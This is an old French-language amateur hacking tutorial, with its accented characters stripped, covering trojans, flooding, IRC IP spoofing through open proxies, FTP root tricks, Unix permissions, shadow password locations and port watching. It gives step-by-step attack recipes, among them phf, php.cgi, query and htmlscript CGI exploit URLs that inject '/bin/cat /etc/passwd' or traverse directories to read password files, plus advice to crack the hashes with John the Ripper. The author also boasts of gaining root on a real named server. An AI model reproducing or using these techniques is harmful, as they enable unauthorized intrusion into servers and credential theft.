J'espre que le fonctionnement d'un troyen est plus clair prsent pour
vous. Ne vous considrez pas hacker car vous utilisez un troyan horse car
la faudrait pas abuser non plus mais dites vous que si vous connaissez la
manire dont il marche, c'est dj a de gagn et a vous aidera pour la
suite...

Blooffer :

C'est un prog qui permet de ne pas tre trac quand on fait un hack.
Autrement appel brouiller d'ip. Mais bon c'est pas du 100% sr car c'est
comme tout, quand on trouve plus fort que soi en face, on tombe sur un
os... Sur ce point J de la F avait raison.

Flooder :
Un flooder c'est un programme qui permet de ralentir les communications
entre une personne et son fournisseur d'accs en gnant les transmissions
des ports du modem de la dite personne. Pour utiliser ce programme contre
quelqu'un, il suffit de connatre son adresse ip. Pour viter de se faire
Flooder, il suffit davoir un prog comme NukeNabber ou d'autres qui
empche le floodage (a se dit?) et qui trouve l'ip de la personne qui vous
floode. Aprs, vous de juger du chtiment. Pour ma part, j'ai horreur qu'on
m'agresse de quelque faon que ce soit. Crasher mes heures? arf ! Qui
sait?
Bon le flooder peut permettre de faire autre chose, c'est dire de virer
quelqu'un. Le principe, on envoie un "ping" quelqu'un, c'est un signal qui
dclenchera en retour un signal de la personne que l'on veut flooder. Un
signal c'est pas mchant mais si vous en envoyez beaucoup, les rponses
seront plus nombreuses et le serveur saturera, et alors l le serveur va
dcider de virer la personne qui envoie trop de donnes, c'est--dire la
victime du floodage (je sais toujours pas si a se dit). Voil voil.

Sniffer:
Un sniffer c'est un logiciel qui permet d'intercepter des paquets sur un
rseau. Cela s'avre trs utile pour intercepter des adresses ip ou des
contenus de paquets susceptibles de passer les firewalls. Cela permet
aussi de connatre les noms d'htes autoriss ainsi que leur adresses MAC,
etc... plein de bonnes choses utiles quoi. Cet article n'est pas fini, j'y
reviendrais plus tard. D'ailleurs je mettrais bientt gobbler dans la partie
Progs pour que vous voyez quoi a ressemble et que vous appreniez
vous en servir.

Scanner d'ip :
C'est un programme qui permet de savoir, partir d'une adresse ip valable,
quel serveur elle appartient. Il permet galement de savoir si le port que

vous avez spcifi est ouvert sur tel ou tel machine. Il existe pleins de
scanners trs bien genre cyberkit et Wingate. Mais bon un scanner est un
scanner et j'en ai mis quelques-uns dans la partie progs de ce site.

Spoofing :
Ah, ah! Haute voltige, pas pour les lamerz. Ca consiste en quoi? Changer
son adresse ip pour contourner des firewall ou autre protections ou pour ne
pas se faire reprer, ne pas se faire tracer, passer incognito quoi. Les tout
tant de prendre une ip qui n'aurait aucune chance de pouvoir vous tre
attribu quoi. Ca permet galement d'intercepter des donnes transitant sur
le rseaux pour les retourner vers soi. Different hacking quoi ( prononcer
avec l'accent s'il vous plat). C'est balaise et c'est suivre, c'est pour
bientt...
Mais je vais quand mme distinguer plusieurs choses, 3 pour tre exact:
- spoofer d'irc, a c'est super simple et c'est pas exactement de a que je
parlais au dbut.
-spoofer de mail, a c'est dj le niveau au dessus ( cent lieus au dessus)
-spoofer de connexion, a c'est balaise, c'est de a que je parlais plus haut.
Spoofer d'irc :
Ca sert ne pas se faire nuker ou pouvoir rentrer dans un salon o vous
tiez banni ou encore flooder en toute impunit...
Pour cela il vous faudra avoir un programme que l'on appelle un scanner
d'ip je vous reporte l'article correspondant si vous ne l'avez pas dj lu. Et
puis vous aurez aussi besoin d'un Mirc mais a si vous savez pas ce que
c'est bah je vois pas pourquoi vous lisez cet article car manifestement vous
n'en aurez pas besoin.
Quand vous vous connect internet votre fournisseur d'accs vous donne
une ip. Jusque l tout va bien. Mais le fournisseurs d'accs pourra l'aide
de cet ip remonter jusqu' vous. C'est donc une bonne raison pour, si vous
voulez faire des truc "pas cool", la cacher. Et tant qu' faire on va prendre
celle d'un autre. Alors vous allez vous allez lancer mirc et vous connecter
un serveur irc quelconque et rentrer dans un salon. Le nom de celui ci n'a
pas d'importance du moment qu'il y a au mons une personne dedans. Vous
allez trouver son ip en faisant un /dns ou un whois. Si vous savez pas
comment faire reportez vous l'article adresse ip. Une fois que vous avez
son ip vous allez lancer votre scanner d'ip. L on va faire un exemple:

Imaginez que le nick (pseudo) du mec soit Assassin et que l'ip que vous
ayez trouv de lui soit 152.194.56.132 (arf encore un mec d'aol, ils sont
partout)
Etant donn qu'un scanner scanne toujours les ip de 0 255 et toujours en
ordre croissant on va rentrer dans le scanner les ip
suivantes: 152.194.56.0 et 152.194.56.255. On choisit un port, le 23, celui
du telnet. Et on lance la recherche. Il va nous sortir plusieurs ip (esprons).
S'il n'en sort pas, on fait un /dns sur un autre nick et ainsi de suite jusqu'
trouver des ip mais normalement pas de problmes. Les ip qui apparatront
sont les ip de machines ayant le port choisi (ici le 23) ouvert. Imaginez que
plusieurs ip sortent dont celle ci: 152.194.56.13
Maintenant vous allez taper l'instruction suivante sur irc: /serveur
ip_du_mec port_tenet
Dans notre exemple: /server 152.194.56.13 23
Mirc va alors vous crire les commandes suivantes:
*** Disconnected
*** Connecting to 152.194.56.13 (23)
Local host: rhylmachine (152.172.127.204)
WinGate>NICK endrix
Connecting to host NICK...Host name lookup for 'NICK' failed
USER RhylKim "rhylmachine" "152.194.56.13" nono lpti robo
Connecting to host USER RhylKim "rhylmachine" "152.194.56.13" ...Host
name lookup for ' USER
RhylKim "rhylmachine" "152.194.56.13" ' failed
Une fois votre ip spoofe auprs d'irc il va falloir vous reconnecter car la
prcdente manip vous a dconnect. et pour a vous allez faire: /raw
nom_du_serveur port_irc
Dans notre exemple: /raw irc01.irc.aol.com 6667
Mirc va alors vous crire les commandes suivantes:
aol.com rg "rhylmachine" "152.194.56.13" ...Host name lookup for ' USER
RhylKim "rhylmachine" "152.194.56.13" ' failed
Connecting to host irc01.irc.aol.com ...Connected
Maintenant les formalits:
votre nick: /nick votre_nick
Dans notre exemple: /nick RhylKim

puis:
/user ident x x full_name
Dans notre exemple: /user nono lpti robo x x rhylmachine
Voil c'est bon votre adresse ip est spoofe sur mirc. Si quelqu'un fait un
/dns ou un whois sur vous, c'est l'adresse ip spoofe qu'il verra et non le
vtre. C'est l que je me retire et que vous allez pouvoir vous affirmer. Je
suis pas un partisan du flood ou du nuk sur irc mais comme je ne pourrais
pas empcher les lames de les utiliser bah je vous donne la mthode de
vous en prserver. Et puis merde faut mettre fin au bannissement des
salons. ;-)
Les articles sur les autres spoff possibles viendront bientt. Donc
patience...

Root :
Un root c'est un mec, ou une fille, qui a le statut de super-user, c'est dire
qu'il a les droits sur un rseau de n'importe quel user (utilisateur) normal
mais qu'il a en plus accs a des commandes et des secteurs que les autres
n'ont pas. Ca lui permettra de changer ce qu'il veut, d'importer ou d'exporter
des fichiers, de crer des programmes sur la machine, de formater, de
supprimer, ... Le but de n'importe quel hacker est de pouvoir devenir root
sur une bcane. Mais pour cela il faut un login (root la plupart du temps) et
un password. Pour a on verra plus tard.

Hack par ftp :


On ne m'a pas encore fait le reproche de ne pas donner assez de
techniques de hacking dans la rubrique hacking mais dans un dsir
d'anticiper ce reproche, je vais donner une manire de hacker un serveur
non scuris par ftp. D'abord on va expliquer ce qu'est ftp. ftp c'est un
protocole qui permet de transmettre des fichiers d'un ordinateur un autre.
Les ports qui lui sont attribus sont les n20 et 21. Quand vous allez sur un
site de Warez pour choper des progs cracks vous passez gnralement
par ftp, vous voulez tlcharger une page WEB, c'est aussi par ftp, quand
vous vous rendez sur un serveur en tant que user, c'est aussi des fois par
ftp. Si vous tes sous windows, pour ouvrir une fentre ftp, il faut faire:
Dmarrer, Excuter, et taper "ftp -n". Bon, faut pas pousser non plus, c'est
pas aussi simple que a de hacker un serveur par ftp, il suffit pas d'ouvrir la

fentre ftp, c'est plus compliqu car chaque serveur demande un login et un
password pour chaque user.
Le truc que je vais vous donner ne marche que sur les serveurs non
scuriss alors n'essayez pas a sur le Pentagone, a marchera pas. On
parle toujours du Pentagone, de la CIA, de la Nasa... mais il y a pleins de
serveurs scuriss dans le monde et ils ne sont pas forcement
gouvernementaux, loin de l...
Je vous donne le truc et on en reparle aprs:
open url_du_site
quote user ftp
quote cwd ~root
quote pass ftp
Mettez des espaces ou je les ai mis et tout ce passera bien.
Exemple:

open www.assassin.com
quote user ftp
quote cwd ~root
quote pass ftp
Ici le serveur a comme adresse url: http://www.assassin.com/.
Ces instructions doivent tre entres dans un fentre ressemblant
beaucoup celle du dos, chaque ligne, il y aura marqu "ftp>". Pour
ouvrir cette fentre on procde comme expliqu prcedement. Une fois
connect un site (aprs avoir tap: open url_du_site), vous verez
apparaitre "Connected to url_du_site". Il se peut qu'aprs vous tre
connect un serveur vous receviez le message suivant: "Ce serveur est
protg" ou "attention aux malversations que vous pourrez faire" ou
"regardes par la fentre, les flics sont dj en bas de chez toi"... Dans ce
cas l c'est mme pas la peine d'aller plus loin car 99% le serveur est
scuris car si l'administrateur rseau a pu tre assez consciencieux pour
mettre un message d'avertissement, il l'est assez pour nous empcher de
pntrer de cette manire dans sont serveur. :-(
Il se peut mme qu'une fois connect, vous voyez "Connexion closed by
remote host.", l c'est encore plus vache, c'est que le serveur n'est pas
accessible de cette manire par ftp. De cette manire seulement.... ;-)
On va voir maintenant ce que le serveur rpond en fonction de ce que l'on
marque et de si oui ou non on pourra rentrer dedans:
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en vert c'est ce que le serveur rpond

Ce qui est en blanc c'est soit ftp soit des remarques de ma part

Serveur que l'on pourra hacker par ce moyen :


ftp>open www.assassin.com
Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version
4.0).
"Ce qu'il y aura marqu dpendra du systme
d'exploitation, de la version de celui ci... Il se
peut mme qu'il y ait marqu la
date et l'heure de la dernire mise jour."
ftp>quote user ftp
331 Anonymous acces allowed, send identify (email name) as password.
ftp>quote cwd ~root
530 Please login with USER and PASS.
ftp>quote pass ftp
230 Anonymous user logged in.
Voil, logiquement et sauf erreur vous tes root
ou tout du moins user, si c'est le cas, il faut
trouver /etc puis dcrypter le password et l vous
vous connecterez en tant que root. :-)

Serveur que l'on ne pourra pas hacker par


ce moyen :
open www.assassin.com
Connected to www.assassin.com
websrv1 Microsoft FTP Service (Version
4.0).
"Ce qu'il y aura marqu dpendra du
systme d'exploitation, de la version de
celui ci... Il se peut mme qu'il y ait marqu
la
date et l'heure de la dernire mise jour."
ftp>quote user ftp
331 Password required for ftp.
ftp>quote cwd ~root
530 Please login with USER and PASS.
ftp>quote pass ftp
530 User ftp cannot log in.
Bon, bah l, rien faire avec cette mthode,
c'est probablement un serveur dit "secure",
quoi que... Bref une seule
remarque:
:-(

Une fois que vous tes root ou user, ca sont les commandes ftp qui
s'appliquent (pas les commandes dos ni les commandes unix):
mkdir : pour crer un rpertoire (exemple: mkdir assassin cre le
rpertoire assassin).
rmdir : pour supprimer un rpertoire (exemple: rmdir
assassin supprime le rpertoire assassin).
pwd : pour voir ou vous tes sur le disque.
cd : pour aller dans un rpertoire (exemple: cd assassin pour aller
dans le rpertoire assassin).
dir : pour voir le contenu de la racine ou du rpertoire o vous tes.
cd / : pour revenir la racine. Ne pas oublier l'espace entre cd et /.
cd .. : pour revenir au rpertoire prcdent. Ne pas oublier l'espace
entre cd et ..
del : pour supprimer un fichier (exemple: del assassin.txt supprime le
fichier assassin.txt).
get : pour prendre un fichier et le mettre sur votre bureau
(exemple: get assassin.txt vous donne le fichier assassin.txt)

J'ai cris cet article le 19/02/99, et pour vous l'illuster un peu, je suis all sur
altavista (pas astalavista) et j'ai tap un mot au hasard (en l'occurrence ici
c'tait tl), je suis tomb sur une dizaine de sites et j'en ai pris un au
hasard, j'ai not son url. L c'tait www.comedie.com (vous savez, le
serveur de la chane tl comdie qui passe sur le cble). J'ai appliqu ce
que j'ai cris au dessus plus deux ou trois autres petits trucs et je suis
devenu root sur la bcane, le temps de m'amuser un petit peu. Je n'ai rien
supprim vu que je suis un gentil hacker mais j'ai laiss des traces de mon
passage... En utilisant cette mthode vous ne serez pas root (777) sur cette
bcane mais vous pourrez quand mme faire pas mal de choses. Cet
exploit tant prim sur la plupart des bcanes, vous ne serez que User,
cependant la perle rare se trouve quelque part, malheureusement avec le
temps elle devient de plus en plus rare. Vous pourrez mme vous en servir
de vmb pour me laisser des messages si le coeur vous en dit...
Pour quitter ftp, vous n'avez qu' taper "quit". Voil c'est tout, amusez vous
bien mais ne foutez pas la merde sinon je ne donnerais plus rien.
PS: Pour la vmb je plaisantais, vitez de le faire car une fois hack, ce
serveur mettra en place des instruments de recherche pour viter que cela
ne recommence. Alors si vous tes dbutant, cherchez un autre serveur,
faites comme j'ai fais pour le serveur de comdie: Altavista.

Les Ports :
Les ports sur une machine sont des entres sur votre pc qui vous
permettent d'changer des informations dans un sens ou dans un autre
avec une autre machine. Sur Internet vous pouvez changer normment
de donnes par plusieurs ports diffrents plusieurs machines. Chaque
port a ses caractristiques, l'un permet de lire le courrier, l'autre permet de
communiquer par icq, un autre permet de tlcharger des fichiers... Il
existes plusieurs centaines de ports diffrents sur une machine, je vous
mettrais plus bas une liste des ports que je j'essaierais de dtailler le plus
possible. Bref, vous l'aurez compris, les ports sont indispensable
l'change d'informations par internet, cependant, comme ils constituent les
seules entres existantes vers votre pc, c'est par la que les hackers
pntrent dans votre machine et rciproquement, c'est par ces ports que
vous vous infiltrerez dans un serveur ou n'importe quel ordinateur.
Certain vous dirons srement quelque chose, comme le port 21 qui est
celui du ftp , le port 23 est aussi assez connu puisque c'est celui du telnet et
aussi l'entre favorite de la majorit des troyens (d'o le nom Socket23), le

port 25 appel SMTP permet d'envoyer du courrier et le port 110 (POP),


permet de relever celui ci. J'en numre la majorit en dessous:

Nom des ports:


echo
discard
systat
daytime
netstat
qotd
chargen
ftp-data
ftp
telnet
smtp
time
rlp
name
whois
domain
nameserver
mtp
bootp
tftp
gopher
rje
finger
http
link
supdup
hostnames
iso-tsap
dictionary & x400
x400-snd
csnet-ns
pop & pop2
pop3
portmap
sunrpc
auth
sftp
path
uucp-path
nntp
ntp
nbname
nbdatagram

N du port et protocole:
7/tcp & 7/udp
9/tcp & 9/udp
11/tcp
13/tcp
15/tcp
17/tcp & 17/udp
19/tcp &19/udp
20/tcp
21/tcp
23/tcp
25/tcp
37/tcp & 37/udp
39/udp
42/tcp & 42/udp
43/tcp
53/tcp & 53/udp
53/tcp & 53/udp
57/tcp
67/udp
69/udp
70/tcp
77/tcp
79/tcp
80/tcp
87/tcp
95/tcp
101/tcp
102/tcp
103/tcp
104/tcp
105/tcp
109/tcp
110/tcp
111/tcp & 111/udp
111/tcp & 111/udp
113/tcp
115/tcp
117/tcp
117/tcp
119/tcp
123/udp
137/udp
138/udp

nbsession
NeWs
sgmp
tcprepo
snmp
snmp-trap
print-srv
vmnet
load
vmnet0
systek
biff
exec
login
who
shell
syslog
printer
talk
ntalk
efs
route
timed
tempo
courier
conference
rdv-control
netwall
uucp
klogin
kshell
new-rwho
remotefs
rmonitor
monitor
garcon
maitrd
busboy
acctmaster
acctslave
acct
acctlogin
acctprinter
elcsd
acctinfo
acctslave2
acctdisk
kerberos
kerberos_master
passwd_server

139/tcp
144/tcp
152/udp
158/tcp
161/udp
162/udp
170/tcp
175/tcp
315/udp
400/tcp
500/udp
512/udp
512/tcp
513/tcp
513/udp
514/tcp
514/udp
515/tcp
517/udp
518/udp
520/tcp
520/udp
525/udp
526/tcp
530/tcp
531/tcp
531/udp
532/tcp
533/udp
540/tcp
543/tcp
544/tcp
550/udp
556/tcp
560/udp
561/udp
600/tcp
601/tcp
602/tcp
700/udp
701/udp
702/udp
703/udp
704/udp
705/udp
706/udp
707/udp
750/tcp & 750/udp
751/tcp & 751/udp
752/udp

userreg_server
kreb_prop
erlogin
kpop
phone
ingreslock
maze
nfs
knetd
eklogin
rmt
mtb
military http
man
w
mantst
bnews
rscs0
queue
rscs1
poker
rscs2
gateway
rscs3
remp
rscs4
rscs5
rscs6
rscs7
rscs8
rscs9
rscsa
rscsb
qmaster

753/udp
754/tcp
888/tcp
1109/tcp
1167/udp
1524/tcp
1666/udp
2049/udp
2053/tcp
2105/tcp
5555/tcp
5556/tcp
5580/tcp
9535/tcp
9536/tcp
9537/tcp
10000/tcp
10000/udp
10001/tcp
10001/udp
10002/tcp
10002/udp
10003/tcp
10003/udp
10004/tcp
10004/udp
10005/udp
10006/udp
10007/udp
10008/udp
10009/udp
10010/udp
10011/udp
10012/tcp & 10012/udp

Comme vous pouvez le voir c'est une liste assez exhaustive, il y en a que je
n'ai pas mis car je ne sais pas a quoi ils servent, il doit en exister un millier
je pense. Je sais qu'il y en a aussi vers les 37000 et quelques mais bon,
c'est pas les plus utiliss et ils risquent rarement d'tre ouvert. Malgr a si
vous en connaissez d'autres en dtail que je n'ai pas cit vous pouvez
toujours me contacter.
Bref je vois pas trop quoi dire d'autre sur les ports sinon que si les vtres
sont tous ferms, vous n'avez aucune chance, mais alors aucune, de vous
faire hacker. Ceci est valable bien sur si votre disque est saint, c'est sur que
si vous tes infect par au minimum un troyen ou si vous avez une bombe
logique camoufle quelque part dans votre ordinateur, vous risquez d'avoir
certains problmes vu qu'un programme comme un troyen a comme but

premier d'ouvrir un port pour que vous puissiez entrer et faire ce que vous y
voulez.

Les FireWalls :

Les droits sous UNIX :


Sous Unix, tous les fichiers et les rpertoires ont des paramtres qui ne
sont dfinissables que par le root et qui permettent de limiter leur accs.
Suivant la personne que vous tes et les droit qui vous sont allous par le
root, vous aurez un droit de faire plus ou moins de choses dans la bcane
o vous tes. Les diffrents droits sont regroups en trois catgories, le
droit d'criture, de lecture et d'excution.
Le premier droit (write: w) permet de supprimer et de crer un fichier ainsi
que de le modifier, de le renommer ou de le dplacer. Le deuxime (read: r)
permet de le lire (code source et autre), quand au troisime (execute: x), il
permet comme son nom l'indique d'excuter des programmes.
Chacun de ces droits est attribu ou non chaque personne sur la bcane.
Chaque personne est place dans un des trois groupes suivants:
propritaire, membre du mme groupe que le propritaire, personne
extrieure.
Ils sont reprsents de la manire suivante quand vous faites un "ls -1"
(comme dir sous dos):

l rwx
1
2a

r-x --2b
2c

0
3

assassin
4

1050
5

15/03/99
6

17:34
7

hacking
8

Tableau d'quivalence :
1 Indique la nature du fichier. d = rpertoire ; l = fichier ;
2a Les droits du propritaire du fichier: dans cet exemple, il a tous les droits ( r + w + x ).
Les droits d'une personne appartenant au mme groupe que la propritaire du fichier:
2b
dans cet exemple il ne peut que lire et excuter le fichier (r + x).
Les droit d'une personne trangre au groupe: dans cet exemple elle n'a aucun droit:
2c le "-" dit qu'il n'a pas de droit. Elle a des "-" en lecture, en criture et en excution, elle
n'a donc pas de droit.
3 Le propritaire du fichier. 0 = root ; 1 = bin ; 2 = daemon ; 3 = adm ; 4 = lp ; 5 = sync ; ...

4
5
6
7
8

; 99 = nobody .
Mais tout ceci change en fonction des choix de l'administrateur systme puisque c'est
paramtrable.
C'est le nom du groupe dont fait parti le propritaire du fichier.
Taille du fichier (en Ko).
La date de la dernire modification ou lecture.
L'heure de la dernire modification ou lecture.
Le nom du fichier ou du rpertoire (selon ce qui est crit au 1)

Donc dans l'exemple du dessus vous voyez qu'il sagit d'un fichier nomm
hacking cre le 15 mars 99 17H34 par le root qui appartient au groupe
assassin (mais pas sr qu'il fasse du rap ;-) ). Le fichier fait 1050 Ko, il peut
tre lu, chang, dplac, supprim, renomm, excut par le propritaire.
Une personne faisant, comme le root, partie du groupe assassin peut, elle,
que lire et excuter le fichier. Une personne extrieure au groupe ne pourra
rien faire avec ce fichier.
Bien sr quand vous faites un ls -1 il y a la plupart du temps plus qu'un
fichier ou qu'un rpertoire qui s'affiche mais la rgle reste la mme.

Les Passwords Shadows :


Joli nom n'est ce pas? Ouais mais ce n'est pas l que pour faire joli en fait.
Vous vous en doutiez je suppose vu que les passwords c'est gnralement
fait pour autoriser un accs aux seuls autoriss et le restreindre ou le barrer
pour les autres. Si vous savez pas ce qu'est un systme Unix, c'est pas la
peine de lire cet article. Bon pour les autres, vous savez que pour se faire
root sur une bcane sous unix il faut connatre le login et le pass du root (et
oui c'est quand mme rare que le root ait gard le mme login). Ces
informations taient gardes dans un fichier appel passwd qui se trouvait
dans le rpertoire /etc. Alors c'tait facile car une fois ce fichier trouv il
suffisait de le passer Jack ou John (cracker Jack ou John the ripper) et
avec ses bibliothques de mots, il moulinait jusqu' trouver le bon et hop le
pass tait trouv (bah oui fallait bien le dcrypter).
Maintenant avec les pass shadows (ou shadows, chacun y verra son
vocabulaire), les fichiers password ne se trouvent plus dans le fichier /etc.
Et oui, c'tait trop facile. Reste que si vous trouvez ce fichier, vous pouvez
toujours utiliser Jack ou John, a marche toujours. Bien sr il faut avoir les
bonnes bibliothque et plus on en a mieux c'est.

O trouver ce fameux password shadow alors? Et ben en fait il faudra que


vous vous renseigniez sur le type d'OS sur lequel vous tes (normal quoi)
et quand vous saurez duquel il sagit, il ne suffira plus qu' aller la pche
aux infos le concernant. Et pour cela on se reporte au beau tableau que j'ai
fait en dessous. Je vous rassure, toutes les infos mises dans ce tableau
n'ont pas tous t collects par moi (loin de l mme), mais elles sont l et
c'est quand mme le principal non?

AIX 3
A/UX
3.Os
BSD4.3Reno
Convex
OS 10
Convex0
S 11
DG/UX
EP/IX
HP-UX
IRIX 5
Linux
1.1

/etc/security/passwd
/tcb/files/auth/
/etc/master.passwd
/etc/shadow
/etc/shadow
/etc/tcb/aa/user
/etc/shadow
/.secure/etc/passwd
/etc/shadow
/etc/shadow

/
SunOS
etc/security/passwd.adj
4.1+c2
unct
SunOS
/etc/shadow
5.0
System
/etc/shadow
V 4.0
UNICOS
/etc/udb

Bah voil c'est tout ce que j'ai, je me rend bien compte que a fait pas
grand chose mais mon avis a sera plus que suffisant pour vous amuser
plus que quelque temps. Ah oui, dernire chose, pour savoir si un pass est
shadow, il suffit d'aller dans le rpertoire o il serait s'il n'tait pas shadow
et de regarder si il y a un X ou une * ou un # , ...

NukeNabber et Port Watchers :

NukeNabber est un port watcher, c'est dire que c'est un programme qui a
pour fonction de fermer vos ports d'couter ce qui passe dessus. Ca permet
de savoir tout moment si quelqu'un essaye de rentrer sur votre machine,
de vous nuker, de scanner vos ports, de vous flooder, d'ouvrir une session
ftp, ... De plus a vous donne l'ip du mec qui veut rentrer. :-) Ce programme
est donc indispensable pour votre scurit et il est disponible sur ce site
dans la partie progs.
J'ai pas fais un article pour vous expliquer a, sinon a va servir qui?
C'tait juste un interlude. Ce que je vais vous expliquer ici, c'est comment le
paramtrer. Parce que les paramtres de bases sont trs insuffisants pour
vous garantir une bonne scurit. Il ne faut rentrer dans NukeNabber que
les ports qui sont indispensables, car mme si vous pouvez en mettre
jusqu' 50, les mettre tous ralentirait votre connection. De plus en coutant
certains ports comme les ports 27, 28 et 29 par exemple qui sont
actuellement utilis, NukeNabber vous marque "Port 29 (tcp) is already in
use" et l a sert rien car non seulement personne ne pouvait passer par
l avant du fait qu'une autre application passait par ce port mais en plus a
bloquera l'application. Vous voulez essayer? Mettez le port 29/tcp sous
coute et vous verrez ce que Netscape va vous dire quand vous essaierez
de vous connecter mon site (ou n'importe quel site sur Internet, mais a
vous donnera une excuse pour revenir. Il en faut une?! ;-) )...
A ouais mais pour cela il faudrait que vous sachiez comment mettre tel ou
tel port sous coute. Vous allez dans File, options, advanced. Vous allez
dans la listes des ports watchs et vous faites descendre l'ascenseur
jusqu' ce que vous voyez un "unassigned", cliquez dessus, puis mettez le
numro du port dans "port to monitor" et le protocole dans "protocol". Les
protocole c'est tcp, udp ou tcmp. Tout a c'est affaire de rseaux,
j'expliquerait plus tard quoi a correspond et ce qui diffrencie les paquets
arrivants de ces diffrents rseaux. Aprs appuyez sur "Add" et voil, le
port est watch. Il sera sous coute ds que vous appuierez sur Ok.
Utilisez les options de ports par dfaut.
Les diffrents ports dangereux couter sont les suivants. J'explique aussi
pourquoi chaque port est dangereux. Sachez qu'en rgle gnrale si vous
ne fermez pas ces ports vous tes 100% expos au risque d'tre nuk,
flood et votre pc de se transformer en serveur ftp ou telnet pour troyens.
Numro des ports watcher: Protocole: Type d'attaque possible par ce port:
Bonne question, du genre troyen mais sans taupe
0
icmp
alors fermez ce port, c'est l'un des plus dangereux.
19
udp
21
tcp
Troyen (et ouais c'est ftp les mecs)

23
53
59
129
137
138
139
666
1027
1029
1032
5000
5001
12345
12346
30303
31337

tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp
tcp

Troyen (et a c'est telnet, sans commentaire)


Nuker, Flooder

Nuker, Flooder

Troyen (par dfaut celui du Sockets de troie)


Troyen (Sockets de troie aussi)
Troyen (par dfaut celui de Netbus)
Troyen (Netbus aussi)
Troyen (je me souviens plus lequel)
Troyen (par dfaut celui de Back Orifice)

Les ports o je n'ai pas mis d'attaque possible c'est pas parce qu'il n'y en a
pas de possible, sinon, je ne les aurais pas mis dans ce tableau. Ce sont
soit les ports donns par dfaut par Nukenabber, donc mme si je sais pas
ce que l'on risque, vaut mieux les mettre quand mme. Soit des ports que
j'avais scuris sur mon NukeNabber il y a pas mal de temps et dont je ne
sais plus les risques possibles. Mais comme je ne met pas les ports au
hasard, mettez les aussi, ce n'est pas du tout du superflu.
Je vous conseille galement de lancer NukeNabber chaque fois que vous
vous connectez sur le net. Sur ma bcane il est lanc chaque dmarrage
en mme temps que l'antivirus. Pour qu'il se lance chaque fois que le pc
s'allume mettez un raccourcit vers NukeNabber dans le rpertoire
dmarrage du menu dmarrer de Windows.

Cgi-bin et Scripts... :
Le titre ne vous dira peut-tre rien, d'ailleurs, j'aurais pas cris l'article je
n'en aurais pas la moindre ide non plus. ;-) On va prendre un exemple
pour expliquer le titre alors. Vous avez srement remarqu quand vous
allez dans un site un "cgi-bin" au niveau de l'url. Il y en a trs souvent dans
les moteurs de recherche. Alta Vista en est d'ailleurs un trs bon exemple.
Vous allez sur alta vista et vous tapez hacking et choisissez la langue
franaise, lancez la recherche. L'url de la page deviendra la suivante:

"http://www.altavista.com/cgi-bin/query?
pg=q&kl=fr&q=hacking&search=Search"
Vous l'avez vu le cgi? Bah voil, c'est a. En gros c'est un programme crit
en pearl ou en c (ou en d'autres langages mais je n'ai entendu parler que
de ceux en pearl et en c) qui permet des accs l'intrieur du serveur par
mot cl. Certaines sries de lettres reprsentent des touches tapes
comme "Enter" par exemple. Ce qui fait qu'en mettant une adresse on
excute un programme, qui, s'il est bugg (plutt si nous connaissons le
bug ;-), car bug il y a toujours), agira en fait comme un outil de recherche
genre "explorateur windows". Un cgi peut vraiment faire beaucoup de
choses: recherche de fichiers, compteur de visites, animations, ... Et son
utilisation dans les sites est trs rpandu vu qu'il a peu prs le mme
potentiel qu'un script Java. Sacr potentiel n'est ce pas?
Ci-dessous diffrentes manires d'exploiter ces bugs pour devenir root ou
pour faire d'autres truc sympa juste avec Netscape. Mme pas besoin de
Linux, c'est pas fort a? Juste d'un petit crack jack, enfin, je vous refais pas
un cours.
Pfs:
Des filtres pas trs au point sur certaines requtes permettent d'accder au
fichier contenant le password root sur les serveur tournant sous NCSA
(version infrieure ou gale 1.5 ) et sous apache (versions infrieures
1.0.5):
http://url_du_site/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/phf?Qalias=x%0a/bin
%20/etc/passwd
Pfs(un autre bug):
Idem mais l, la commande change vraiment trs peu et a ne marche pas
que sur ceux numrs au dessus:
http://url_du_site/cgi-bin/phf?Qname=x%0a/bin/cat%20/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/phf?Qname=x%0a/bin
%20/etc/passwd
Php:
Mme chose que ci-dessus sauf que c'est avec php. La syntaxe n'est pas
la mme mais le rsultat est identique, on a le pass root:
http://url_du site/cgi-bin/php.cgi?/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/php.cgi?/etc/passwd

Php(un autre bug):


Idem mais l, la commande change vraiment trs peu:
http://url_du site/cgi-bin/php?/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/php?/etc/passwd
Query:
L c'est encore la mme chose mais a marche avec query:
http://url_du site/cgi-bin/query?%0a/bin/cat%20/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/query?%0a/bin/cat
%20/etc/passwd
Htmlscript:
L aussi a sert devenir root en trouvant le pass root, le tout est de savoir
o se trouve le rpertoire /etc par rapport au cgi-bin. Si vous connaissez un
peu l'arborescence des rpertoires sous UNIX vous ne devriez pas avoir
trop de problme vous reprer, surtout que vous n'tes pas oblig de
mettre /etc/passwd mais par exemple: /usr/rhylkim, sous peine bien sr que
le fichier rhylkim et le rpertoire /usr xistent.
http://url_du_site/cgi-bin/htmlscript?.../.../etc/passwd
Exemple: http://www.assassin.com/cgi-bin/htmlscript?../../../etc/passwd
Dans cet exemple il sagissait de redescendre la racine l o se trouve le
rpertoire /etc et pour cela on est descendu de trois niveaux vu que dans
cet exemple, le cgi-bin se trouvait dans le rpertoire: /web/info/revelation.
Mais ce n'est qu'un exemple. Le cgi-bin pourrait trs bien se trouver dans le
rpertoire: /bin/rhylkim et on aurait t oblig de
faire:http://www.assassin.com/cgi-bin/htmlscript?../../etc/passwd.
Voil, c'est tout, j'en ai encore une petite dizaine mais ce sera pour un autre
jour car ce sont essentiellement des scripts. Pour tous les exemples
prcdents, il sagissait de serveurs n'ayant pas de pass shadows. Si vous
voulez exploiter ces bugs avec une machine ayant des pass shadows (la
plupart d'ailleurs) il faudra pour cela remplacer /etc/passwd par le rpertoire
et le fichier pass correspondant suivant le type de serveur attaqu. Pour
connatre les correspondances suivant l'OS du serveur, allez
l'article:Passwords shadows.

Cerner une cible :

Pour combattre un ennemi il faut le connatre. C'est pareil pour un hack, il


va falloir obtenir un certain nombre de renseignements (le plus possible
d'ailleurs) sur la machine que l'ont veut hacker, on va l'appeler la machine
"cible". Pour cel on dispose de pas mal d'outils. Tous ne s'appliqueront pas
toutes les machines car leur niveau de scurit diffre et certains se
